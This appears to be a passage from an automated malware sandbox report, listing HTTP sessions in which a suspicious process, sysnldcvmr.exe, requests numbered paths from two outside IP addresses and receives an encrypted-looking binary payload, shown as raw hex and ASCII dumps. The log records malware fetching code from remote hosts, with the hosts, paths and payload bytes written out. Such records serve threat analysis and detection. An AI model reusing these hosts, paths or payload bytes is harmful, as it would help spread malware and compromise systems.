                                                                                                                                                                                                                                                  Data Ascii: YP(<4+MhArpY3!n/}Ch#8Cj;AS`K6k#8#_^W@_"l(0x$sU,?C:*^O7Vg#mmR(uIU ^#~pg6goqTH[?sT7 bWOVJCEvtSW(.M-aFy}kf>h+Ru1]r"nLjLe.Y!;rc/k{D#RqG}57*= c#X7o/fU3RyFU<GTYRpL4d_a,r-E2//&-W&]+LK@6HlOcR$pZZQcp1;bIr^;~SJ,mWwijEX6o57_IcPmqf/F#u={7z/X59ThJ(pcMRjsrM4o^xSd\6i1>z*)mZCks-'kvV6?hQ^j-m+;<E)r034, =Rl@O#6P_asA|?g}o k?Z5nD8E%|QL>G \@ #3zaY[g0aGiG<E#oZR-j]O b|S,Z?9C&]:jE>90F]qj(>rXn{v^e
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:30.871323109 CET1236INData Raw: c6 7d 84 30 24 76 89 f0 37 5b fe 25 aa 52 93 09 22 e8 f0 4c 0a d9 9f e6 45 fe cc ed b4 af 8e 4c e4 d6 b7 de ab a2 e5 09 3c 68 a2 d8 37 ae d1 0f 94 d8 79 62 f8 4b 8c 24 6c 8f 02 df 92 3e b4 00 98 f9 87 60 ed 95 84 3f 74 c3 b9 d3 0e 94 6c fb 0c 4c
                                                                                                                                                                                                                                                  Data Ascii: }0$v7[%R"LEL<h7ybK$l>`?tlL's%[WX,FTjHihQ<Rr3G<d4LV$@M<_dT|,g+U[zh^PI_wQvVs|nXaGIr30pZYz]>
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:30.871336937 CET1236INData Raw: a9 48 83 d2 10 f4 b5 8a 35 25 2e 77 45 f8 5d 3f 91 e1 2b a7 1a ab 43 6e ba f5 88 8a b7 01 06 21 4e 06 67 b5 98 56 96 0b 75 8b 11 70 97 42 33 77 ee 76 44 11 f4 b7 76 6b b7 15 ef 25 c1 80 a8 eb 2a ae 34 6f d4 65 d7 ff 02 e9 4b b4 7d 78 99 87 5f 14
                                                                                                                                                                                                                                                  Data Ascii: H5%.wE]?+Cn!NgVupB3wvDvk%*4oeK}x_UzOqUR3<mi659wIwh6BqN,kk2g l6my5-67Z'O+M<U\R,Yn/cXtwl'T-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:30.871499062 CET672INData Raw: 08 e2 42 7b 64 54 85 29 7e 35 15 93 c2 d3 c8 02 11 06 ed 8f 60 73 21 07 d0 5a 5b 39 e8 df 93 eb 85 4a 10 b4 32 a3 0e a6 31 81 7e da 45 d1 93 37 a8 3d b3 9a ef 2b 82 34 4c a8 67 bf c1 ed 20 df fb 7a 8c 4f 36 3b f3 43 fd 01 d7 3b da 75 3d 17 4e 03
                                                                                                                                                                                                                                                  Data Ascii: B{dT)~5`s!Z[9J21~E7=+4Lg zO6;C;u=NaXc/q|"I&DF0<=aAlVvxdlX\@0lEB5`FMc*CsOBs0`:R<&^)}ucG9#s[1
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:30.871527910 CET1236INData Raw: d9 57 9f 53 30 7b 44 09 d4 4d eb 88 c7 2b 33 1d a1 dc 84 36 03 21 1f 2d 5b d9 ea 42 41 22 b7 64 69 c2 ff 56 76 c8 58 9a dd 5e 5d 06 34 b0 33 88 a2 86 43 5b 16 14 c6 cd 14 6e 7f 28 d4 df 58 9f 6e ee 93 30 ed e5 34 3e 91 af 17 bd 9d a3 d2 14 87 c1
                                                                                                                                                                                                                                                  Data Ascii: WS0{DM+36!-[BA"diVvX^]43C[n(Xn04>;hM>t}\r^l8O^]_o,qiM7H)KzOQ!_l5>mtJ"`=Wlf>_NghwR/|~o$c>"
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:30.871539116 CET1236INData Raw: a7 85 a8 10 06 f9 f7 d9 eb 25 72 08 b7 a9 9a ea b8 3a 98 f0 98 8e 29 dd e7 50 bc 36 66 93 31 d4 bc 10 59 df 46 a8 ce 7a 14 5c 6d 67 8d 42 e9 4a c8 09 47 4c d8 d1 16 1e 55 21 ce 2c dd 9a 9e 81 08 40 3d 77 f5 55 1b 6b e4 3e 9a 47 6a 8f 57 a0 fa 6e
                                                                                                                                                                                                                                                  Data Ascii: %r:)P6f1YFz\mgBJGLU!,@=wUk>GjWnu(nQr{k68fCR,q=K.Gdq-^FpTV_uO=bmq%~4s}*28mpi3N(<.VZXMyrxD7VVm-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:30.871551991 CET1236INData Raw: bd f9 39 67 d2 4a 86 5d 7a 9c ae 55 3b 2f 15 68 53 e2 2b 20 9c 5c b8 f2 9c f5 d8 bf 81 46 12 51 d7 b7 f2 de 19 f2 b5 27 95 d6 03 8d a3 f3 86 8a 76 e0 f9 eb 6f 00 a8 fa 2d b7 ca f2 2c 31 a4 54 88 b8 f9 5d 27 a2 59 83 35 dc 2a 5c 10 16 23 b1 cd 90
                                                                                                                                                                                                                                                  Data Ascii: 9gJ]zU;/hS+ \FQ'vo-,1T]'Y5*\#;;dZpYQM7#s<Y_-2f?.iAgW%RmmjCGrs?BF4X^"Yn9*/tp7nms}n2;]n
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:30.871572018 CET1236INData Raw: 6e 69 26 15 28 df fc d4 4f 36 c5 93 ca 6f 8d 58 34 0c f5 53 01 78 2d 10 c6 2d 7c ca 9e 6b 05 69 57 9a 27 54 03 46 09 ca d2 3b 25 0c 10 82 11 fe 2e 45 d8 78 5a f9 7d d2 5f c2 d0 60 53 30 8b 71 01 0a 21 30 86 ee c2 09 4e c8 63 1e 39 5e 80 cf 99 45
                                                                                                                                                                                                                                                  Data Ascii: ni&(O6oX4Sx--|kiW'TF;%.ExZ}_`S0q!0Nc9^EySD6`L0Gk{42BCWv6amV_?}"o_w#~_Pf.ym<-#jD*9kX-]kiAudCSd*!ve1:`CWac((eHx
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:30.871862888 CET1236INData Raw: 37 35 89 38 17 df b7 91 93 b3 36 2d 6a 3d db 8b 22 cc 2d f2 ae 67 c2 2a c9 4a bc f1 70 3c b7 26 5d 32 c7 3d af d2 f6 07 b6 fd ee 97 19 2e ed fe 79 03 e5 d2 9d 70 30 c3 d2 cc 53 04 fc 62 bd c7 64 ec 19 63 9b 48 84 71 d9 b4 84 11 bb 48 d7 b7 5d 54
                                                                                                                                                                                                                                                  Data Ascii: 7586-j="-g*Jp<&]2=.yp0SbdcHqH]T|1pX3t/I+.?h!7v?NJAE=oaT:O(sR*Au P+H~p2.X$I2Hsd hU0ZX$^CQl\$XHv %
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:30.871875048 CET1236INData Raw: 11 5b c4 39 88 5b cb cc ca fa bf c3 97 4b 5e 6e 40 5c 80 48 77 01 26 d3 b6 54 43 98 97 77 9e e8 ec f5 f0 c2 a0 9f d6 ff 0c 23 19 98 62 29 c0 5b ad 53 f6 7e f0 5c e3 49 3d 47 09 ff 33 f6 05 cc 4e f4 cc 44 5d a4 82 2b 69 a4 0a 3a a0 79 96 48 3e 2e
                                                                                                                                                                                                                                                  Data Ascii: [9[K^n@\Hw&TCw#b)[S~\I=G3ND]+i:yH>.!=l$pJsNZ$yy*=)X-GfX`PYr*Fo{[ffqGCT#'!#^ltJeBu6GqY$:EGUry8Dph
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:30.992971897 CET1236INData Raw: d7 ae 3f 6d 70 e4 29 ef 9c d2 6f dc 08 b2 55 77 0c 3e 97 5f 45 47 2b d0 ba 0a c1 c6 67 27 c3 5b f6 d9 3b 41 68 24 df 4c 29 84 2b 43 1f 01 ce e7 c2 11 34 66 c4 55 2d 11 b1 43 0e 3a 1f 8f fa 22 cf 2c b8 38 be 9a da a2 d5 14 6d 74 15 9e 4d 83 84 f7
                                                                                                                                                                                                                                                  Data Ascii: ?mp)oUw>_EG+g'[;Ah$L)+C4fU-C:",8mtMd"!&;\:PNc/o~M93k]U=?1{K5yo~Xf{7.fqrW8V&mc>uB9}hfEDZ3go.w {1


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  38192.168.2.115005291.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:34.924503088 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:36.240149975 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:36 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  39192.168.2.115005491.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:39.150943041 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:40.417804956 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:40 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  40192.168.2.115005591.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:43.096632004 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:44.421602011 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  41192.168.2.115005791.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:46.868303061 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:48.157490969 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:47 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  42192.168.2.115005991.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:51.165313959 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:52.510428905 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:52 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  43192.168.2.1150061185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:57.347877026 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:58.674635887 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:58 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 9472
                                                                                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674f01b0-2500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: Eqn7n*%v u&PUK:PXwj>?hr"BH+<_i@Ft(*sIe0al.BM_$"o6*65&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O*0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b|HyW9>Sgx%2S\4`zG
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:58.674704075 CET224INData Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81
                                                                                                                                                                                                                                                  Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw|1r $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:58.674715996 CET1236INData Raw: 8e eb 48 af 17 20 f3 16 45 0f f6 22 35 c5 47 84 c8 5b 9b ee 41 dd f5 91 39 f3 5c 27 78 dc 89 5a 98 4c 55 f0 96 f5 fd d2 27 30 c9 c1 9c 4f 8a 19 5d 66 85 2e 53 48 0e bb 87 e6 03 96 ed 01 cf db 1e ee c2 0e 9c c2 bf 84 7a 76 5f 0d f6 e3 4a 9c ce d1
                                                                                                                                                                                                                                                  Data Ascii: H E"5G[A9\'xZLU'0O]f.SHzv_JnUC6C-!-H;DF6($enNQ>G0(}+RnFjvU4K">;9(jX4^(5h#m^wy5^
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:58.674771070 CET1236INData Raw: 8c ad 39 5f 58 c9 04 23 39 ec 60 3c db 9f 60 38 08 31 31 4d 45 c1 45 43 90 19 4d e5 9d 5f 62 4f b3 6a 32 80 6a de 8d c9 d4 01 a1 80 76 bc 76 ed ab ed af e1 3b 29 c3 29 9e da 8d fe 18 7a 34 82 36 a8 a6 01 57 dc 46 37 89 7a 1f e7 63 fe 91 08 4d 4f
                                                                                                                                                                                                                                                  Data Ascii: 9_X#9`<`811MEECM_bOj2jvv;))z46WF7zcMOYmHJc)6m&%Z'|:.o85>$=-Lbypf)u>nss<y:e0lE#!)D|.GkN
